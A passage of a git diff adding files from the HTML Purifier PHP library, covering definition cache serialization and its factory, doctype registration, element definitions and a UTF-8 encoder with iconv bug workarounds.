+ + /** + * Generates path to base directory that contains all definition type + * serials + * @todo Make protected + */ + public function generateBaseDirectoryPath($config) { + $base = $config->get('Cache.SerializerPath'); + $base = is_null($base) ? HTMLPURIFIER_PREFIX . '/HTMLPurifier/DefinitionCache/Serializer' : $base; + return $base; + } + + /** + * Convenience wrapper function for file_put_contents + * @param $file File name to write to + * @param $data Data to write into file + * @param $config Config object + * @return Number of bytes written if success, or false if failure. + */ + private function _write($file, $data, $config) { + $result = file_put_contents($file, $data); + if ($result !== false) { + // set permissions of the new file (no execute) + $chmod = $config->get('Cache.SerializerPermissions'); + if (!$chmod) { + $chmod = 0644; // invalid config or simpletest + } + $chmod = $chmod & 0666; + chmod($file, $chmod); + } + return $result; + } + + /** + * Prepares the directory that this type stores the serials in + * @param $config Config object + * @return True if successful + */ + private function _prepareDir($config) { + $directory = $this->generateDirectoryPath($config); + $chmod = $config->get('Cache.SerializerPermissions'); + if (!$chmod) { + $chmod = 0755; // invalid config or simpletest + } + if (!is_dir($directory)) { + $base = $this->generateBaseDirectoryPath($config); + if (!is_dir($base)) { + trigger_error('Base directory '.$base.' does not exist, + please create or change using %Cache.SerializerPath', + E_USER_WARNING); + return false; + } elseif (!$this->_testPermissions($base, $chmod)) { + return false; + } + $old = umask(0000); + mkdir($directory, $chmod); + umask($old); + } elseif (!$this->_testPermissions($directory, $chmod)) { + return false; + } + return true; + } + + /** + * Tests permissions on a directory and throws out friendly + * error messages and attempts to chmod it itself if possible + * @param $dir Directory path + * @param $chmod Permissions + * @return True if directory writable + */ + private function _testPermissions($dir, $chmod) { + // early abort, if it is writable, everything is hunky-dory + if (is_writable($dir)) return true; + if (!is_dir($dir)) { + // generally, you'll want to handle this beforehand + // so a more specific error message can be given + trigger_error('Directory '.$dir.' does not exist', + E_USER_WARNING); + return false; + } + if (function_exists('posix_getuid')) { + // POSIX system, we can give more specific advice + if (fileowner($dir) === posix_getuid()) { + // we can chmod it ourselves + $chmod = $chmod | 0700; + if (chmod($dir, $chmod)) return true; + } elseif (filegroup($dir) === posix_getgid()) { + $chmod = $chmod | 0070; + } else { + // PHP's probably running as nobody, so we'll + // need to give global permissions + $chmod = $chmod | 0777; + } + trigger_error('Directory '.$dir.' not writable, '. + 'please chmod to ' . decoct($chmod), + E_USER_WARNING); + } else { + // generic error message + trigger_error('Directory '.$dir.' not writable, '. + 'please alter file permissions', + E_USER_WARNING); + } + return false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer/README b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer/README new file mode 100755 index 000000000..2e35c1c3d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer/README @@ -0,0 +1,3 @@ +This is a dummy file to prevent Git from ignoring this empty directory. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCacheFactory.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCacheFactory.php new file mode 100644 index 000000000..a6ead6281 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCacheFactory.php @@ -0,0 +1,91 @@ +<?php + +/** + * Responsible for creating definition caches. + */ +class HTMLPurifier_DefinitionCacheFactory +{ + + protected $caches = array('Serializer' => array()); + protected $implementations = array(); + protected $decorators = array(); + + /** + * Initialize default decorators + */ + public function setup() { + $this->addDecorator('Cleanup'); + } + + /** + * Retrieves an instance of global definition cache factory. + */ + public static function instance($prototype = null) { + static $instance; + if ($prototype !== null) { + $instance = $prototype; + } elseif ($instance === null || $prototype === true) { + $instance = new HTMLPurifier_DefinitionCacheFactory(); + $instance->setup(); + } + return $instance; + } + + /** + * Registers a new definition cache object + * @param $short Short name of cache object, for reference + * @param $long Full class name of cache object, for construction + */ + public function register($short, $long) { + $this->implementations[$short] = $long; + } + + /** + * Factory method that creates a cache object based on configuration + * @param $name Name of definitions handled by cache + * @param $config Instance of HTMLPurifier_Config + */ + public function create($type, $config) { + $method = $config->get('Cache.DefinitionImpl'); + if ($method === null) { + return new HTMLPurifier_DefinitionCache_Null($type); + } + if (!empty($this->caches[$method][$type])) { + return $this->caches[$method][$type]; + } + if ( + isset($this->implementations[$method]) && + class_exists($class = $this->implementations[$method], false) + ) { + $cache = new $class($type); + } else { + if ($method != 'Serializer') { + trigger_error("Unrecognized DefinitionCache $method, using Serializer instead", E_USER_WARNING); + } + $cache = new HTMLPurifier_DefinitionCache_Serializer($type); + } + foreach ($this->decorators as $decorator) { + $new_cache = $decorator->decorate($cache); + // prevent infinite recursion in PHP 4 + unset($cache); + $cache = $new_cache; + } + $this->caches[$method][$type] = $cache; + return $this->caches[$method][$type]; + } + + /** + * Registers a decorator to add to all new cache objects + * @param + */ + public function addDecorator($decorator) { + if (is_string($decorator)) { + $class = "HTMLPurifier_DefinitionCache_Decorator_$decorator"; + $decorator = new $class; + } + $this->decorators[$decorator->name] = $decorator; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Doctype.php b/lib/htmlpurifier/library/HTMLPurifier/Doctype.php new file mode 100644 index 000000000..1e3c574c0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Doctype.php @@ -0,0 +1,60 @@ +<?php + +/** + * Represents a document type, contains information on which modules + * need to be loaded. + * @note This class is inspected by Printer_HTMLDefinition->renderDoctype. + * If structure changes, please update that function. + */ +class HTMLPurifier_Doctype +{ + /** + * Full name of doctype + */ + public $name; + + /** + * List of standard modules (string identifiers or literal objects) + * that this doctype uses + */ + public $modules = array(); + + /** + * List of modules to use for tidying up code + */ + public $tidyModules = array(); + + /** + * Is the language derived from XML (i.e. XHTML)? + */ + public $xml = true; + + /** + * List of aliases for this doctype + */ + public $aliases = array(); + + /** + * Public DTD identifier + */ + public $dtdPublic; + + /** + * System DTD identifier + */ + public $dtdSystem; + + public function __construct($name = null, $xml = true, $modules = array(), + $tidyModules = array(), $aliases = array(), $dtd_public = null, $dtd_system = null + ) { + $this->name = $name; + $this->xml = $xml; + $this->modules = $modules; + $this->tidyModules = $tidyModules; + $this->aliases = $aliases; + $this->dtdPublic = $dtd_public; + $this->dtdSystem = $dtd_system; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DoctypeRegistry.php b/lib/htmlpurifier/library/HTMLPurifier/DoctypeRegistry.php new file mode 100644 index 000000000..86049e939 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DoctypeRegistry.php @@ -0,0 +1,103 @@ +<?php + +class HTMLPurifier_DoctypeRegistry +{ + + /** + * Hash of doctype names to doctype objects + */ + protected $doctypes; + + /** + * Lookup table of aliases to real doctype names + */ + protected $aliases; + + /** + * Registers a doctype to the registry + * @note Accepts a fully-formed doctype object, or the + * parameters for constructing a doctype object + * @param $doctype Name of doctype or literal doctype object + * @param $modules Modules doctype will load + * @param $modules_for_modes Modules doctype will load for certain modes + * @param $aliases Alias names for doctype + * @return Editable registered doctype + */ + public function register($doctype, $xml = true, $modules = array(), + $tidy_modules = array(), $aliases = array(), $dtd_public = null, $dtd_system = null + ) { + if (!is_array($modules)) $modules = array($modules); + if (!is_array($tidy_modules)) $tidy_modules = array($tidy_modules); + if (!is_array($aliases)) $aliases = array($aliases); + if (!is_object($doctype)) { + $doctype = new HTMLPurifier_Doctype( + $doctype, $xml, $modules, $tidy_modules, $aliases, $dtd_public, $dtd_system + ); + } + $this->doctypes[$doctype->name] = $doctype; + $name = $doctype->name; + // hookup aliases + foreach ($doctype->aliases as $alias) { + if (isset($this->doctypes[$alias])) continue; + $this->aliases[$alias] = $name; + } + // remove old aliases + if (isset($this->aliases[$name])) unset($this->aliases[$name]); + return $doctype; + } + + /** + * Retrieves reference to a doctype of a certain name + * @note This function resolves aliases + * @note When possible, use the more fully-featured make() + * @param $doctype Name of doctype + * @return Editable doctype object + */ + public function get($doctype) { + if (isset($this->aliases[$doctype])) $doctype = $this->aliases[$doctype]; + if (!isset($this->doctypes[$doctype])) { + trigger_error('Doctype ' . htmlspecialchars($doctype) . ' does not exist', E_USER_ERROR); + $anon = new HTMLPurifier_Doctype($doctype); + return $anon; + } + return $this->doctypes[$doctype]; + } + + /** + * Creates a doctype based on a configuration object, + * will perform initialization on the doctype + * @note Use this function to get a copy of doctype that config + * can hold on to (this is necessary in order to tell + * Generator whether or not the current document is XML + * based or not). + */ + public function make($config) { + return clone $this->get($this->getDoctypeFromConfig($config)); + } + + /** + * Retrieves the doctype from the configuration object + */ + public function getDoctypeFromConfig($config) { + // recommended test + $doctype = $config->get('HTML.Doctype'); + if (!empty($doctype)) return $doctype; + $doctype = $config->get('HTML.CustomDoctype'); + if (!empty($doctype)) return $doctype; + // backwards-compatibility + if ($config->get('HTML.XHTML')) { + $doctype = 'XHTML 1.0'; + } else { + $doctype = 'HTML 4.01'; + } + if ($config->get('HTML.Strict')) { + $doctype .= ' Strict'; + } else { + $doctype .= ' Transitional'; + } + return $doctype; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ElementDef.php b/lib/htmlpurifier/library/HTMLPurifier/ElementDef.php new file mode 100644 index 000000000..5498d9567 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ElementDef.php @@ -0,0 +1,183 @@ +<?php + +/** + * Structure that stores an HTML element definition. Used by + * HTMLPurifier_HTMLDefinition and HTMLPurifier_HTMLModule. + * @note This class is inspected by HTMLPurifier_Printer_HTMLDefinition. + * Please update that class too. + * @warning If you add new properties to this class, you MUST update + * the mergeIn() method. + */ +class HTMLPurifier_ElementDef +{ + + /** + * Does the definition work by itself, or is it created solely + * for the purpose of merging into another definition? + */ + public $standalone = true; + + /** + * Associative array of attribute name to HTMLPurifier_AttrDef + * @note Before being processed by HTMLPurifier_AttrCollections + * when modules are finalized during + * HTMLPurifier_HTMLDefinition->setup(), this array may also + * contain an array at index 0 that indicates which attribute + * collections to load into the full array. It may also + * contain string indentifiers in lieu of HTMLPurifier_AttrDef, + * see HTMLPurifier_AttrTypes on how they are expanded during + * HTMLPurifier_HTMLDefinition->setup() processing. + */ + public $attr = array(); + + /** + * Indexed list of tag's HTMLPurifier_AttrTransform to be done before validation + */ + public $attr_transform_pre = array(); + + /** + * Indexed list of tag's HTMLPurifier_AttrTransform to be done after validation + */ + public $attr_transform_post = array(); + + /** + * HTMLPurifier_ChildDef of this tag. + */ + public $child; + + /** + * Abstract string representation of internal ChildDef rules. See + * HTMLPurifier_ContentSets for how this is parsed and then transformed + * into an HTMLPurifier_ChildDef. + * @warning This is a temporary variable that is not available after + * being processed by HTMLDefinition + */ + public $content_model; + + /** + * Value of $child->type, used to determine which ChildDef to use, + * used in combination with $content_model. + * @warning This must be lowercase + * @warning This is a temporary variable that is not available after + * being processed by HTMLDefinition + */ + public $content_model_type; + + + + /** + * Does the element have a content model (#PCDATA | Inline)*? This + * is important for chameleon ins and del processing in + * HTMLPurifier_ChildDef_Chameleon. Dynamically set: modules don't + * have to worry about this one. + */ + public $descendants_are_inline = false; + + /** + * List of the names of required attributes this element has. Dynamically + * populated by HTMLPurifier_HTMLDefinition::getElement + */ + public $required_attr = array(); + + /** + * Lookup table of tags excluded from all descendants of this tag. + * @note SGML permits exclusions for all descendants, but this is + * not possible with DTDs or XML Schemas. W3C has elected to + * use complicated compositions of content_models to simulate + * exclusion for children, but we go the simpler, SGML-style + * route of flat-out exclusions, which correctly apply to + * all descendants and not just children. Note that the XHTML + * Modularization Abstract Modules are blithely unaware of such + * distinctions. + */ + public $excludes = array(); + + /** + * This tag is explicitly auto-closed by the following tags. + */ + public $autoclose = array(); + + /** + * If a foreign element is found in this element, test if it is + * allowed by this sub-element; if it is, instead of closing the + * current element, place it inside this element. + */ + public $wrap; + + /** + * Whether or not this is a formatting element affected by the + * "Active Formatting Elements" algorithm. + */ + public $formatting; + + /** + * Low-level factory constructor for creating new standalone element defs + */ + public static function create($content_model, $content_model_type, $attr) { + $def = new HTMLPurifier_ElementDef(); + $def->content_model = $content_model; + $def->content_model_type = $content_model_type; + $def->attr = $attr; + return $def; + } + + /** + * Merges the values of another element definition into this one. + * Values from the new element def take precedence if a value is + * not mergeable. + */ + public function mergeIn($def) { + + // later keys takes precedence + foreach($def->attr as $k => $v) { + if ($k === 0) { + // merge in the includes + // sorry, no way to override an include + foreach ($v as $v2) { + $this->attr[0][] = $v2; + } + continue; + } + if ($v === false) { + if (isset($this->attr[$k])) unset($this->attr[$k]); + continue; + } + $this->attr[$k] = $v; + } + $this->_mergeAssocArray($this->attr_transform_pre, $def->attr_transform_pre); + $this->_mergeAssocArray($this->attr_transform_post, $def->attr_transform_post); + $this->_mergeAssocArray($this->excludes, $def->excludes); + + if(!empty($def->content_model)) { + $this->content_model = + str_replace("#SUPER", $this->content_model, $def->content_model); + $this->child = false; + } + if(!empty($def->content_model_type)) { + $this->content_model_type = $def->content_model_type; + $this->child = false; + } + if(!is_null($def->child)) $this->child = $def->child; + if(!is_null($def->formatting)) $this->formatting = $def->formatting; + if($def->descendants_are_inline) $this->descendants_are_inline = $def->descendants_are_inline; + + } + + /** + * Merges one array into another, removes values which equal false + * @param $a1 Array by reference that is merged into + * @param $a2 Array that merges into $a1 + */ + private function _mergeAssocArray(&$a1, $a2) { + foreach ($a2 as $k => $v) { + if ($v === false) { + if (isset($a1[$k])) unset($a1[$k]); + continue; + } + $a1[$k] = $v; + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Encoder.php b/lib/htmlpurifier/library/HTMLPurifier/Encoder.php new file mode 100644 index 000000000..9fa76bd18 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Encoder.php @@ -0,0 +1,540 @@ +<?php + +/** + * A UTF-8 specific character encoder that handles cleaning and transforming. + * @note All functions in this class should be static. + */ +class HTMLPurifier_Encoder +{ + + /** + * Constructor throws fatal error if you attempt to instantiate class + */ + private function __construct() { + trigger_error('Cannot instantiate encoder, call methods statically', E_USER_ERROR); + } + + /** + * Error-handler that mutes errors, alternative to shut-up operator. + */ + public static function muteErrorHandler() {} + + /** + * iconv wrapper which mutes errors, but doesn't work around bugs. + */ + public static function unsafeIconv($in, $out, $text) { + set_error_handler(array('HTMLPurifier_Encoder', 'muteErrorHandler')); + $r = iconv($in, $out, $text); + restore_error_handler(); + return $r; + } + + /** + * iconv wrapper which mutes errors and works around bugs. + */ + public static function iconv($in, $out, $text, $max_chunk_size = 8000) { + $code = self::testIconvTruncateBug(); + if ($code == self::ICONV_OK) { + return self::unsafeIconv($in, $out, $text); + } elseif ($code == self::ICONV_TRUNCATES) { + // we can only work around this if the input character set + // is utf-8 + if ($in == 'utf-8') { + if ($max_chunk_size < 4) { + trigger_error('max_chunk_size is too small', E_USER_WARNING); + return false; + } + // split into 8000 byte chunks, but be careful to handle + // multibyte boundaries properly + if (($c = strlen($text)) <= $max_chunk_size) { + return self::unsafeIconv($in, $out, $text); + } + $r = ''; + $i = 0; + while (true) { + if ($i + $max_chunk_size >= $c) { + $r .= self::unsafeIconv($in, $out, substr($text, $i)); + break; + } + // wibble the boundary + if (0x80 != (0xC0 & ord($text[$i + $max_chunk_size]))) { + $chunk_size = $max_chunk_size; + } elseif (0x80 != (0xC0 & ord($text[$i + $max_chunk_size - 1]))) { + $chunk_size = $max_chunk_size - 1; + } elseif (0x80 != (0xC0 & ord($text[$i + $max_chunk_size - 2]))) { + $chunk_size = $max_chunk_size - 2; + } elseif (0x80 != (0xC0 & ord($text[$i + $max_chunk_size - 3]))) { + $chunk_size = $max_chunk_size - 3; + } else { + return false; // rather confusing UTF-8... + } + $chunk = substr($text, $i, $chunk_size); // substr doesn't mind overlong lengths + $r .= self::unsafeIconv($in, $out, $chunk); + $i += $chunk_size; + } + return $r; + } else { + return false; + } + } else { + return false; + } + } + + /** + * Cleans a UTF-8 string for well-formedness and SGML validity + * + * It will parse according to UTF-8 and return a valid UTF8 string, with + * non-SGML codepoints excluded. + * + * @note Just for reference, the non-SGML code points are 0 to 31 and + * 127 to 159, inclusive. However, we allow code points 9, 10 + * and 13, which are the tab, line feed and carriage return + * respectively. 128 and above the code points map to multibyte + * UTF-8 representations. + * + * @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and + * hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the + * LGPL license. Notes on what changed are inside, but in general, + * the original code transformed UTF-8 text into an array of integer + * Unicode codepoints. Understandably, transforming that back to + * a string would be somewhat expensive, so the function was modded to + * directly operate on the string. However, this discourages code + * reuse, and the logic enumerated here would be useful for any + * function that needs to be able to understand UTF-8 characters. + * As of right now, only smart lossless character encoding converters + * would need that, and I'm probably not going to implement them. + * Once again, PHP 6 should solve all our problems. + */ + public static function cleanUTF8($str, $force_php = false) { + + // UTF-8 validity is checked since PHP 4.3.5 + // This is an optimization: if the string is already valid UTF-8, no + // need to do PHP stuff. 99% of the time, this will be the case. + // The regexp matches the XML char production, as well as well as excluding + // non-SGML codepoints U+007F to U+009F + if (preg_match('/^[\x{9}\x{A}\x{D}\x{20}-\x{7E}\x{A0}-\x{D7FF}\x{E000}-\x{FFFD}\x{10000}-\x{10FFFF}]*$/Du', $str)) { + return $str; + } + + $mState = 0; // cached expected number of octets after the current octet + // until the beginning of the next UTF8 character sequence + $mUcs4 = 0; // cached Unicode character + $mBytes = 1; // cached expected number of octets in the current sequence + + // original code involved an $out that was an array of Unicode + // codepoints. Instead of having to convert back into UTF-8, we've + // decided to directly append valid UTF-8 characters onto a string + // $out once they're done. $char accumulates raw bytes, while $mUcs4 + // turns into the Unicode code point, so there's some redundancy. + + $out = ''; + $char = ''; + + $len = strlen($str); + for($i = 0; $i < $len; $i++) { + $in = ord($str{$i}); + $char .= $str[$i]; // append byte to char + if (0 == $mState) { + // When mState is zero we expect either a US-ASCII character + // or a multi-octet sequence. + if (0 == (0x80 & ($in))) { + // US-ASCII, pass straight through. + if (($in <= 31 || $in == 127) && + !($in == 9 || $in == 13 || $in == 10) // save \r\t\n + ) { + // control characters, remove + } else { + $out .= $char; + } + // reset + $char = ''; + $mBytes = 1; + } elseif (0xC0 == (0xE0 & ($in))) { + // First octet of 2 octet sequence + $mUcs4 = ($in); + $mUcs4 = ($mUcs4 & 0x1F) << 6; + $mState = 1; + $mBytes = 2; + } elseif (0xE0 == (0xF0 & ($in))) { + // First octet of 3 octet sequence + $mUcs4 = ($in); + $mUcs4 = ($mUcs4 & 0x0F) << 12; + $mState = 2; + $mBytes = 3; + } elseif (0xF0 == (0xF8 & ($in))) { + // First octet of 4 octet sequence + $mUcs4 = ($in); + $mUcs4 = ($mUcs4 & 0x07) << 18; + $mState = 3; + $mBytes = 4; + } elseif (0xF8 == (0xFC & ($in))) { + // First octet of 5 octet sequence. + // + // This is illegal because the encoded codepoint must be + // either: + // (a) not the shortest form or + // (b) outside the Unicode range of 0-0x10FFFF. + // Rather than trying to resynchronize, we will carry on + // until the end of the sequence and let the later error + // handling code catch it. + $mUcs4 = ($in); + $mUcs4 = ($mUcs4 & 0x03) << 24; + $mState = 4; + $mBytes = 5; + } elseif (0xFC == (0xFE & ($in))) { + // First octet of 6 octet sequence, see comments for 5 + // octet sequence. + $mUcs4 = ($in); + $mUcs4 = ($mUcs4 & 1) << 30; + $mState = 5; + $mBytes = 6; + } else { + // Current octet is neither in the US-ASCII range nor a + // legal first octet of a multi-octet sequence. + $mState = 0; + $mUcs4 = 0; + $mBytes = 1; + $char = ''; + } + } else { + // When mState is non-zero, we expect a continuation of the + // multi-octet sequence + if (0x80 == (0xC0 & ($in))) { + // Legal continuation. + $shift = ($mState - 1) * 6; + $tmp = $in; + $tmp = ($tmp & 0x0000003F) << $shift; + $mUcs4 |= $tmp; + + if (0 == --$mState) { + // End of the multi-octet sequence. mUcs4 now contains + // the final Unicode codepoint to be output + + // Check for illegal sequences and codepoints. + + // From Unicode 3.1, non-shortest form is illegal + if (((2 == $mBytes) && ($mUcs4 < 0x0080)) || + ((3 == $mBytes) && ($mUcs4 < 0x0800)) || + ((4 == $mBytes) && ($mUcs4 < 0x10000)) || + (4 < $mBytes) || + // From Unicode 3.2, surrogate characters = illegal + (($mUcs4 & 0xFFFFF800) == 0xD800) || + // Codepoints outside the Unicode range are illegal + ($mUcs4 > 0x10FFFF) + ) { + + } elseif (0xFEFF != $mUcs4 && // omit BOM + // check for valid Char unicode codepoints + ( + 0x9 == $mUcs4 || + 0xA == $mUcs4 || + 0xD == $mUcs4 || + (0x20 <= $mUcs4 && 0x7E >= $mUcs4) || + // 7F-9F is not strictly prohibited by XML, + // but it is non-SGML, and thus we don't allow it + (0xA0 <= $mUcs4 && 0xD7FF >= $mUcs4) || + (0x10000 <= $mUcs4 && 0x10FFFF >= $mUcs4) + ) + ) { + $out .= $char; + } + // initialize UTF8 cache (reset) + $mState = 0; + $mUcs4 = 0; + $mBytes = 1; + $char = ''; + } + } else { + // ((0xC0 & (*in) != 0x80) && (mState != 0)) + // Incomplete multi-octet sequence. + // used to result in complete fail, but we'll reset + $mState = 0; + $mUcs4 = 0; + $mBytes = 1; + $char =''; + } + } + } + return $out; + } + + /** + * Translates a Unicode codepoint into its corresponding UTF-8 character. + * @note Based on Feyd's function at + * <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>, + * which is in public domain. + * @note While we're going to do code point parsing anyway, a good + * optimization would be to refuse to translate code points that + * are non-SGML characters. However, this could lead to duplication. + * @note This is very similar to the unichr function in + * maintenance/generate-entity-file.php (although this is superior, + * due to its sanity checks). + */ + + // +----------+----------+----------+----------+ + // | 33222222 | 22221111 | 111111 | | + // | 10987654 | 32109876 | 54321098 | 76543210 | bit + // +----------+----------+----------+----------+ + // | | | | 0xxxxxxx | 1 byte 0x00000000..0x0000007F + // | | | 110yyyyy | 10xxxxxx | 2 byte 0x00000080..0x000007FF + // | | 1110zzzz | 10yyyyyy | 10xxxxxx | 3 byte 0x00000800..0x0000FFFF + // | 11110www | 10wwzzzz | 10yyyyyy | 10xxxxxx | 4 byte 0x00010000..0x0010FFFF + // +----------+----------+----------+----------+ + // | 00000000 | 00011111 | 11111111 | 11111111 | Theoretical upper limit of legal scalars: 2097151 (0x001FFFFF) + // | 00000000 | 00010000 | 11111111 | 11111111 | Defined upper limit of legal scalar codes + // +----------+----------+----------+----------+ + + public static function unichr($code) { + if($code > 1114111 or $code < 0 or + ($code >= 55296 and $code <= 57343) ) { + // bits are set outside the "valid" range as defined + // by UNICODE 4.1.0 + return ''; + } + + $x = $y = $z = $w = 0; + if ($code < 128) { + // regular ASCII character + $x = $code; + } else { + // set up bits for UTF-8 + $x = ($code & 63) | 128; + if ($code < 2048) { + $y = (($code & 2047) >> 6) | 192; + } else { + $y = (($code & 4032) >> 6) | 128; + if($code < 65536) { + $z = (($code >> 12) & 15) | 224; + } else { + $z = (($code >> 12) & 63) | 128; + $w = (($code >> 18) & 7) | 240; + } + } + } + // set up the actual character + $ret = ''; + if($w) $ret .= chr($w); + if($z) $ret .= chr($z); + if($y) $ret .= chr($y); + $ret .= chr($x); + + return $ret; + } + + public static function iconvAvailable() { + static $iconv = null; + if ($iconv === null) { + $iconv = function_exists('iconv') && self::testIconvTruncateBug() != self::ICONV_UNUSABLE; + } + return $iconv; + } + + /** + * Converts a string to UTF-8 based on configuration. + */ + public static function convertToUTF8($str, $config, $context) { + $encoding = $config->get('Core.Encoding'); + if ($encoding === 'utf-8') return $str; + static $iconv = null; + if ($iconv === null) $iconv = self::iconvAvailable(); + if ($iconv && !$config->get('Test.ForceNoIconv')) { + // unaffected by bugs, since UTF-8 support all characters + $str = self::unsafeIconv($encoding, 'utf-8//IGNORE', $str); + if ($str === false) { + // $encoding is not a valid encoding + trigger_error('Invalid encoding ' . $encoding, E_USER_ERROR); + return ''; + } + // If the string is bjorked by Shift_JIS or a similar encoding + // that doesn't support all of ASCII, convert the naughty + // characters to their true byte-wise ASCII/UTF-8 equivalents. + $str = strtr($str, self::testEncodingSupportsASCII($encoding)); + return $str; + } elseif ($encoding === 'iso-8859-1') { + $str = utf8_encode($str); + return $str; + } + trigger_error('Encoding not supported, please install iconv', E_USER_ERROR); + } + + /** + * Converts a string from UTF-8 based on configuration. + * @note Currently, this is a lossy conversion, with unexpressable + * characters being omitted. + */ + public static function convertFromUTF8($str, $config, $context) { + $encoding = $config->get('Core.Encoding'); + if ($escape = $config->get('Core.EscapeNonASCIICharacters')) { + $str = self::convertToASCIIDumbLossless($str); + } + if ($encoding === 'utf-8') return $str; + static $iconv = null; + if ($iconv === null) $iconv = self::iconvAvailable(); + if ($iconv && !$config->get('Test.ForceNoIconv')) { + // Undo our previous fix in convertToUTF8, otherwise iconv will barf + $ascii_fix = self::testEncodingSupportsASCII($encoding); + if (!$escape && !empty($ascii_fix)) { + $clear_fix = array(); + foreach ($ascii_fix as $utf8 => $native) $clear_fix[$utf8] = ''; + $str = strtr($str, $clear_fix); + } + $str = strtr($str, array_flip($ascii_fix)); + // Normal stuff + $str = self::iconv('utf-8', $encoding . '//IGNORE', $str); + return $str; + } elseif ($encoding === 'iso-8859-1') { + $str = utf8_decode($str); + return $str; + } + trigger_error('Encoding not supported', E_USER_ERROR); + // You might be tempted to assume that the ASCII representation + // might be OK, however, this is *not* universally true over all + // encodings. So we take the conservative route here, rather + // than forcibly turn on %Core.EscapeNonASCIICharacters + } + + /** + * Lossless (character-wise) conversion of HTML to ASCII + * @param $str UTF-8 string to be converted to ASCII + * @returns ASCII encoded string with non-ASCII character entity-ized + * @warning Adapted from MediaWiki, claiming fair use: this is a common + * algorithm. If you disagree with this license fudgery, + * implement it yourself. + * @note Uses decimal numeric entities since they are best supported. + * @note This is a DUMB function: it has no concept of keeping + * character entities that the projected character encoding + * can allow. We could possibly implement a smart version + * but that would require it to also know which Unicode + * codepoints the charset supported (not an easy task). + * @note Sort of with cleanUTF8() but it assumes that $str is + * well-formed UTF-8 + */ + public static function convertToASCIIDumbLossless($str) { + $bytesleft = 0; + $result = ''; + $working = 0; + $len = strlen($str); + for( $i = 0; $i < $len; $i++ ) { + $bytevalue = ord( $str[$i] ); + if( $bytevalue <= 0x7F ) { //0xxx xxxx + $result .= chr( $bytevalue ); + $bytesleft = 0; + } elseif( $bytevalue <= 0xBF ) { //10xx xxxx + $working = $working << 6; + $working += ($bytevalue & 0x3F); + $bytesleft--; + if( $bytesleft <= 0 ) { + $result .= "&#" . $working . ";"; + } + } elseif( $bytevalue <= 0xDF ) { //110x xxxx + $working = $bytevalue & 0x1F; + $bytesleft = 1; + } elseif( $bytevalue <= 0xEF ) { //1110 xxxx + $working = $bytevalue & 0x0F; + $bytesleft = 2; + } else { //1111 0xxx + $working = $bytevalue & 0x07; + $bytesleft = 3; + } + } + return $result; + } + + /** No bugs detected in iconv. */ + const ICONV_OK = 0; + + /** Iconv truncates output if converting from UTF-8 to another + * character set with //IGNORE, and a non-encodable character is found */ + const ICONV_TRUNCATES = 1; + + /** Iconv does not support //IGNORE, making it unusable for + * transcoding purposes */ + const ICONV_UNUSABLE = 2; + + /** + * glibc iconv has a known bug where it doesn't handle the magic + * //IGNORE stanza correctly. In particular, rather than ignore + * characters, it will return an EILSEQ after consuming some number + * of characters, and expect you to restart iconv as if it were + * an E2BIG. Old versions of PHP did not respect the errno, and + * returned the fragment, so as a result you would see iconv + * mysteriously truncating output. We can work around this by + * manually chopping our input into segments of about 8000 + * characters, as long as PHP ignores the error code. If PHP starts + * paying attention to the error code, iconv becomes unusable. + * + * @returns Error code indicating severity of bug. + */ + public static function testIconvTruncateBug() { + static $code = null; + if ($code === null) { + // better not use iconv, otherwise infinite loop! + $r = self::unsafeIconv('utf-8', 'ascii//IGNORE', "\xCE\xB1" . str_repeat('a', 9000)); + if ($r === false) { + $code = self::ICONV_UNUSABLE; + } elseif (($c = strlen($r)) < 9000) { + $code = self::ICONV_TRUNCATES; + } elseif ($c > 9000) { + trigger_error('Your copy of iconv is extremely buggy. Please notify HTML Purifier maintainers: include your iconv version as per phpversion()', E_USER_ERROR); + } else { + $code = self::ICONV_OK; + } + } + return $code; + } + + /** + * This expensive function tests whether or not a given character + * encoding supports ASCII. 7/8-bit encodings like Shift_JIS will + * fail this test, and require special processing. Variable width + * encodings shouldn't ever fail. + * + * @param string $encoding Encoding name to test, as per iconv format + * @param bool $bypass Whether or not to bypass the precompiled arrays. + * @return Array of UTF-8 characters to their corresponding ASCII, + * which can be used to "undo" any overzealous iconv action. + */ + public static function testEncodingSupportsASCII($encoding, $bypass = false) { + // All calls to iconv here are unsafe, proof by case analysis: + // If ICONV_OK, no difference. + // If ICONV_TRUNCATE, all calls involve one character inputs, + // so bug is not triggered. + // If ICONV_UNUSABLE, this call is irrelevant + static $encodings = array(); + if (!$bypass) { + if (isset($encodings[$encoding])) return $encodings[$encoding]; + $lenc = strtolower($encoding); + switch ($lenc) { + case 'shift_jis': + return array("\xC2\xA5" => '\\', "\xE2\x80\xBE" => '~'); + case 'johab': + return array("\xE2\x82\xA9" => '\\'); + } + if (strpos($lenc, 'iso-8859-') === 0) return array(); + } + $ret = array(); + if (self::unsafeIconv('UTF-8', $encoding, 'a') === false) return false; + for ($i = 0x20; $i <= 0x7E; $i++) { // all printable ASCII chars + $c = chr($i); // UTF-8 char + $r = self::unsafeIconv('UTF-8', "$encoding//IGNORE", $c); // initial conversion + if ( + $r === '' || + // This line is needed for iconv implementations that do not + // omit characters that do not exist in the target character set + ($r === $c && self::unsafeIconv($encoding, 'UTF-8//IGNORE', $r) !== $c) + ) { + // Reverse engineer: what's the UTF-8 equiv of this byte + // sequence? This assumes that there's no variable width + // encoding that doesn't support ASCII. + 